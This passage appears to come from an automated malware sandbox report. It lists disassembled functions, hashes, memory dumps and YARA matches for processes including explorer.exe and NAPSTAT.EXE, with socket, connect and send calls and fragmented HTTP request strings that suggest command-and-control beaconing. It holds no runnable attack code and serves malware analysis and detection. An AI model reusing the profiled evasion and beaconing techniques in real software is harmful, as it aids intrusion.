                                                                                                                                                        0x00942449
                                                                                                                                                        0x00942453
                                                                                                                                                        0x00942455
                                                                                                                                                        0x0094245b
                                                                                                                                                        0x0094245b
                                                                                                                                                        0x0090eb99
                                                                                                                                                        0x0090eb99
                                                                                                                                                        0x0090eb9c
                                                                                                                                                        0x0090eb9d
                                                                                                                                                        0x0090eb9f
                                                                                                                                                        0x0090eba2
                                                                                                                                                        0x00942465
                                                                                                                                                        0x0094246b
                                                                                                                                                        0x0094246d
                                                                                                                                                        0x0090eba8
                                                                                                                                                        0x0090eba9
                                                                                                                                                        0x0090eba9
                                                                                                                                                        0x0090ebae
                                                                                                                                                        0x0090ebb3
                                                                                                                                                        0x0090ebb9
                                                                                                                                                        0x0090ebbb
                                                                                                                                                        0x00942513
                                                                                                                                                        0x00942514
                                                                                                                                                        0x00942519
                                                                                                                                                        0x0094251b
                                                                                                                                                        0x0090ec2a
                                                                                                                                                        0x0090ec2d
                                                                                                                                                        0x0090ec33
                                                                                                                                                        0x0090ec36
                                                                                                                                                        0x0090ec3a
                                                                                                                                                        0x0090ec3e
                                                                                                                                                        0x0090ec40
                                                                                                                                                        0x0090ec47
                                                                                                                                                        0x0090ec47
                                                                                                                                                        0x0090ec40
                                                                                                                                                        0x008e22c6
                                                                                                                                                        0x0090ebc1
                                                                                                                                                        0x0090ebc1
                                                                                                                                                        0x0090ebc5
                                                                                                                                                        0x0090ec9a
                                                                                                                                                        0x0090ec9a
                                                                                                                                                        0x0090ebd6
                                                                                                                                                        0x0090ebd6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0090ebbb
                                                                                                                                                        0x00942477
                                                                                                                                                        0x0094247c
                                                                                                                                                        0x00942486
                                                                                                                                                        0x0094248b
                                                                                                                                                        0x00942496
                                                                                                                                                        0x0094249b
                                                                                                                                                        0x0094249d
                                                                                                                                                        0x009424a0
                                                                                                                                                        0x009424a3
                                                                                                                                                        0x009424aa
                                                                                                                                                        0x009424aa
                                                                                                                                                        0x009424a5
                                                                                                                                                        0x009424a5
                                                                                                                                                        0x009424a5
                                                                                                                                                        0x009424ac
                                                                                                                                                        0x009424af
                                                                                                                                                        0x009424b0
                                                                                                                                                        0x009424b3
                                                                                                                                                        0x009424b9
                                                                                                                                                        0x009424ba
                                                                                                                                                        0x009424bb
                                                                                                                                                        0x009424c6
                                                                                                                                                        0x009424cb
                                                                                                                                                        0x009424cd
                                                                                                                                                        0x009424d0
                                                                                                                                                        0x009424d1
                                                                                                                                                        0x009424d4
                                                                                                                                                        0x009424d6
                                                                                                                                                        0x009424d9
                                                                                                                                                        0x009424d9
                                                                                                                                                        0x009424dc
                                                                                                                                                        0x009424df
                                                                                                                                                        0x009424e1
                                                                                                                                                        0x009424e7
                                                                                                                                                        0x009424e9
                                                                                                                                                        0x009424ec
                                                                                                                                                        0x009424ef
                                                                                                                                                        0x009424f2
                                                                                                                                                        0x009424f2
                                                                                                                                                        0x009424ef
                                                                                                                                                        0x009424e7
                                                                                                                                                        0x009424fa
                                                                                                                                                        0x009424ff
                                                                                                                                                        0x00942501
                                                                                                                                                        0x00942503
                                                                                                                                                        0x00942506
                                                                                                                                                        0x0094250b
                                                                                                                                                        0x0090eb8c
                                                                                                                                                        0x0090eb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0090eb93
                                                                                                                                                        0x00000000
                                                                                                                                                        0x0090eb99
                                                                                                                                                        0x0090ec85
                                                                                                                                                        0x0090ec85
                                                                                                                                                        0x0090ec85
                                                                                                                                                        0x00000000

                                                                                                                                                        Strings
                                                                                                                                                        • RTL: Re-Waiting, xrefs: 009424FA
                                                                                                                                                        • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 0094248D
                                                                                                                                                        • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 009424BD
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                                                                                                                        • API String ID: 0-3177188983
                                                                                                                                                        • Opcode ID: 437f2f62e3698289a329e32d2d746f5a88988d9b064090e756940e6b77b82383
                                                                                                                                                        • Instruction ID: 79d3f361d88bd54194509c2bb0874614fe463adb0ee82fcb9406b4e0bbb3ffdb
                                                                                                                                                        • Opcode Fuzzy Hash: 437f2f62e3698289a329e32d2d746f5a88988d9b064090e756940e6b77b82383
                                                                                                                                                        • Instruction Fuzzy Hash: 47410770A00204AFDB20DFA9DC89F6A77B9FF85720F208A15F555DB2D1D738E9418B61
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0091FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fassign
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3965848254-0
                                                                                                                                                        • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction ID: 4e83bbbba3a2dd59214ac9b67b663ebc1daac38c6867af60d6e2911b4481eb6c
                                                                                                                                                        • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                                                                                                                                        • Instruction Fuzzy Hash: 2C918D36F0020EEBDF24CF98C855AEEB7B8FF55305F20847AD451A61A2E7304A91CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0091FE4F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 0091FED6: ___swprintf_l.LIBCMT ref: 0091FEFD
                                                                                                                                                        • ___swprintf_l.LIBCMT ref: 0094EA87
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.2117953088.00000000008D0000.00000040.00000001.sdmp, Offset: 008C0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.2117948859.00000000008C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118033421.00000000009B0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118037245.00000000009C0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118042385.00000000009C4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118047677.00000000009C7000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118051325.00000000009D0000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.2118076646.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ___swprintf_l
                                                                                                                                                        • String ID: :%u$uuww
                                                                                                                                                        • API String ID: 48624451-599810794
                                                                                                                                                        • Opcode ID: abf74d54e38a88e250e4a8b6eb38a3c0853f84353677ab08a548d9bbb967d984
                                                                                                                                                        • Instruction ID: ca36570e09f8daf3049cdd33fd06b92038e726ff9819e9dcdbd2a31c0b2bc471
                                                                                                                                                        • Opcode Fuzzy Hash: abf74d54e38a88e250e4a8b6eb38a3c0853f84353677ab08a548d9bbb967d984
                                                                                                                                                        • Instruction Fuzzy Hash: 3211B47260021DEBCB10DEA9CC509EFB7ACFB54700B50492AF855C3251E774E9448BA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Analysis Process: explorer.exe PID: 1388 Parent PID: 2564 explorer.exeCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 02956302, Relevance: 23.7, APIs: 3, Strings: 10, Instructions: 911networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: getaddrinforecvsetsockopt
                                                                                                                                                        • String ID: Co$&br=$&un=$: cl$=$GET $dat=$nnec$ose$tion
                                                                                                                                                        • API String ID: 1564272048-2976227712
                                                                                                                                                        • Opcode ID: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                                                                                        • Instruction ID: 614ce5d9bd288799c4a934e331670a1628c3a278d7b28e7f7aceb04c3b0a3f15
                                                                                                                                                        • Opcode Fuzzy Hash: b31e8b864956b6b4abfa9b859ad4291af29cc5130ca763e476aa0a2d5a1583bf
                                                                                                                                                        • Instruction Fuzzy Hash: CE627130718B188FD769EB68D484BEAB7E6FB94300F50492ED89BC7246DF30A545CB46
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 02952EFE, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: closesocket
                                                                                                                                                        • String ID: clos$esoc$ket
                                                                                                                                                        • API String ID: 2781271927-3604069445
                                                                                                                                                        • Opcode ID: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                                                                                                        • Instruction ID: 4eaa1a994ddf86487acba655224ceef92ef70d9178867bc14a61110cbe42647f
                                                                                                                                                        • Opcode Fuzzy Hash: debb1de1ae8bd1935cf3204c4e922018d3bc3bd1fa25b861d450e182fb477b51
                                                                                                                                                        • Instruction Fuzzy Hash: BBF06D7021CB089BCB84DF1894887A9B7E0FB89314F94056DE88ECA205CB7885428782
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 02952F02, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: closesocket
                                                                                                                                                        • String ID: clos$esoc$ket
                                                                                                                                                        • API String ID: 2781271927-3604069445
                                                                                                                                                        • Opcode ID: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                                                                                                        • Instruction ID: 209f27283c02f9f26b6281b2609451b9b7fb371988d9ac2f7b5c765f2caa0fa4
                                                                                                                                                        • Opcode Fuzzy Hash: 38f943f3a1bf856e04ab8ffe01a156dfd9c5375a96730fcfdde4480564b18170
                                                                                                                                                        • Instruction Fuzzy Hash: 55F01D70618B089FCB84DF18D0C4759B7E0FB89314F54556DA84ECB245CB7485468B82
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 02952E7E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: connect
                                                                                                                                                        • String ID: conn$ect
                                                                                                                                                        • API String ID: 1959786783-716201944
                                                                                                                                                        • Opcode ID: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                                                                                                        • Instruction ID: aeb957053f6ef28a826d42d9f3746aed0f20d3ff903107dc6d5aadb819357965
                                                                                                                                                        • Opcode Fuzzy Hash: fb95bafb82b3473d6ef4390d0af350634b81bde5baa335949624609cad2727e7
                                                                                                                                                        • Instruction Fuzzy Hash: D5012C70618A188FDB84EF5CE088B15BBE0EB59314F1545AEE94DCB267CBB4C8858B85
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 02952E82, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: connect
                                                                                                                                                        • String ID: conn$ect
                                                                                                                                                        • API String ID: 1959786783-716201944
                                                                                                                                                        • Opcode ID: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                                                                                                                        • Instruction ID: a89e6367cc03d555c8f78f93a84ee8d2d300af74c98dd87b82c5ad0533ea6ea9
                                                                                                                                                        • Opcode Fuzzy Hash: 26898fd5f90645f94afd46a3ac35e2686c27f416d54a17c3d9a13a012a848fc3
                                                                                                                                                        • Instruction Fuzzy Hash: B4014F70618A188FDB84EF5CE088B15B7E0FB58314F1541AFE80DCB227CB70C8818B81
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 02952DF7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: send
                                                                                                                                                        • String ID: send
                                                                                                                                                        • API String ID: 2809346765-2809346765
                                                                                                                                                        • Opcode ID: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                                                                                                                        • Instruction ID: cd16a74446d19f1ef29b309785e6d47306dc0084cf77be2e189f6082f05dcc05
                                                                                                                                                        • Opcode Fuzzy Hash: 06a0e18ca9c1e1e84b1de7ba9482a901a96b4c92f796fb4ce4398a9b5ac61c15
                                                                                                                                                        • Instruction Fuzzy Hash: EC01087061C6188FDB94EF5CE049B1577E4EB9C314F1545AD984DCB266CB70D842CBC1
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 02952E02, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: send
                                                                                                                                                        • String ID: send
                                                                                                                                                        • API String ID: 2809346765-2809346765
                                                                                                                                                        • Opcode ID: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                                                                                                                        • Instruction ID: 10758cba9cd8c1926ad180d85e41b1235a756a52ec94f5dc598668d34acf059e
                                                                                                                                                        • Opcode Fuzzy Hash: 3773d62206420a3ed138edb7b0d1187259b6e4662953c22d04494397483c12ef
                                                                                                                                                        • Instruction Fuzzy Hash: B4011E3061CB188FDB88EF5CE088B15B7E0EB9C324F1545AE984DCB266CB70D881CB81
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 02952D02, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: socket
                                                                                                                                                        • String ID: sock
                                                                                                                                                        • API String ID: 98920635-2415254727
                                                                                                                                                        • Opcode ID: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                                                                                                                        • Instruction ID: 66b878a5737700d80e1ffa61a7861ce4be1819e9c34f927012fa2ceae35e4b15
                                                                                                                                                        • Opcode Fuzzy Hash: 324350153747078c09b6e059cc1e16611ed0418a95caa11cf7f7e91404692acf
                                                                                                                                                        • Instruction Fuzzy Hash: 12012C70658A188FDB84EF5CE048B14BBE0FB98314F1541AEE84DCB266C7B4C9418B85
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0294E272, Relevance: 1.6, APIs: 1, Instructions: 81COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000006.00000002.2379028177.0000000002910000.00000040.00000001.sdmp, Offset: 02910000, based on PE: false
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Sleep
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3472027048-0
                                                                                                                                                        • Opcode ID: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                                                                                                                        • Instruction ID: 1abe6f85f9306d45d290c20a38bb7687691e0510cbabf125918dd75bb8ec9c01
                                                                                                                                                        • Opcode Fuzzy Hash: fd57b9079238b9e4bf1c504420f21d1e9a897069bc43c21d39ffc44af76478d5
                                                                                                                                                        • Instruction Fuzzy Hash: 99216D34614B4D8FDBA8EF589084AAAB3A6FB94304F48067ECD9DCB246CF709440CB91
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Analysis Process: NAPSTAT.EXE PID: 2820 Parent PID: 1388 NAPSTAT.EXECOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 000981BA, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71filenativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00093B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B97,007A002E,00000000,00000060,00000000,00000000), ref: 0009820D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 823142352-1441809116
                                                                                                                                                        • Opcode ID: 2cd2e8081aa97a836281e2c6ffc23810a248fa25900e6b8091681eab628c0ba3
                                                                                                                                                        • Instruction ID: aca9b53c100f88974c5d21a2e656078e50447c34fb3fddf40aa6f87fd6758d25
                                                                                                                                                        • Opcode Fuzzy Hash: 2cd2e8081aa97a836281e2c6ffc23810a248fa25900e6b8091681eab628c0ba3
                                                                                                                                                        • Instruction Fuzzy Hash: 322108B2210149AFCB08DF98D884CEB77A9FF8D354B15864DF95D97202C630E851CBA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 000981C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtCreateFile.NTDLL(00000060,00000000,.z`,00093B97,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00093B97,007A002E,00000000,00000060,00000000,00000000), ref: 0009820D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        • String ID: .z`
                                                                                                                                                        • API String ID: 823142352-1441809116
                                                                                                                                                        • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                        • Instruction ID: 3953399a447763dc599493f4bbd7d4de33ce8ad3883e721744936cab2f5d3ff5
                                                                                                                                                        • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                                                                                                        • Instruction Fuzzy Hash: F5F0B6B2201108ABCB08CF88DC85DEB77ADAF8C754F158248FA0D97241C630E811CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 000982EB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL(0=,?,?,00093D30,00000000,FFFFFFFF), ref: 00098315
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID: 0=
                                                                                                                                                        • API String ID: 3535843008-3357461656
                                                                                                                                                        • Opcode ID: b3ec95138bf0d61471c9bca1bc573295dd62235804d0820b1310c0b81caf86a4
                                                                                                                                                        • Instruction ID: c99a8fc24c7c54ee062e8ad6b3857ccc8a03f28848c9b23fcfb77bf895c0711c
                                                                                                                                                        • Opcode Fuzzy Hash: b3ec95138bf0d61471c9bca1bc573295dd62235804d0820b1310c0b81caf86a4
                                                                                                                                                        • Instruction Fuzzy Hash: AEF0FE76200114ABDB14EFD8DC80EEB776DEF89720F14C559FA589B252DA30E9148BA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 000982F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20nativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtClose.NTDLL(0=,?,?,00093D30,00000000,FFFFFFFF), ref: 00098315
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Close
                                                                                                                                                        • String ID: 0=
                                                                                                                                                        • API String ID: 3535843008-3357461656
                                                                                                                                                        • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                        • Instruction ID: ee8d57c7b8349823735f6f48cbcf7e004926b1167d4b78a9965bbbc00e6f8300
                                                                                                                                                        • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                                        • Instruction Fuzzy Hash: 84D012752002146BD710EF98CC45ED7775CEF44750F154455BA589B242C930F90087E0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0009826A, Relevance: 1.6, APIs: 1, Instructions: 73filenativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A11,?,?,?,?,00093A11,FFFFFFFF,?,R=,?,00000000), ref: 000982B5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                        • Opcode ID: f341c27a24302460da6598ec1f6ac45ea71e4978ec3d1700532319ca803e112a
                                                                                                                                                        • Instruction ID: 7f18dd48e56f6b26d09740add430a88bd5c7205ba029e0962d8465575ba87f3d
                                                                                                                                                        • Opcode Fuzzy Hash: f341c27a24302460da6598ec1f6ac45ea71e4978ec3d1700532319ca803e112a
                                                                                                                                                        • Instruction Fuzzy Hash: 8421BBB2200108AFDB14DF99DC81EEB77ADEF8C754F158649FA1D97241CA30E811CBA4
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00098270, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtReadFile.NTDLL(?,?,FFFFFFFF,00093A11,?,?,?,?,00093A11,FFFFFFFF,?,R=,?,00000000), ref: 000982B5
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                        • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                        • Instruction ID: 26b68e528120a6b9dd8d01e5645173cc0670380afba32790f40ae4e5793e4c23
                                                                                                                                                        • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                                                                                                        • Instruction Fuzzy Hash: 18F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158648BA1D97241DA30E811CBA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 000983A0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00082D11,00002000,00003000,00000004), ref: 000983D9
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2376582663.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                                                                                                                                        Yara matches
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AllocateMemoryVirtual
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2167126740-0
                                                                                                                                                        • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                        • Instruction ID: b64b3c3fc6ea8456ba2a422ba143758fb0c25bfa3ef310ba33bd823830389be6
                                                                                                                                                        • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                                                                                                        • Instruction Fuzzy Hash: EAF015B2200208ABCB14DF89CC81EEB77ADAF88750F118548FE0897241CA30F810CBE0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 023400C4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000007.00000002.2377230842.0000000002330000.00000040.00000001.sdmp, Offset: 02320000, based on PE: true
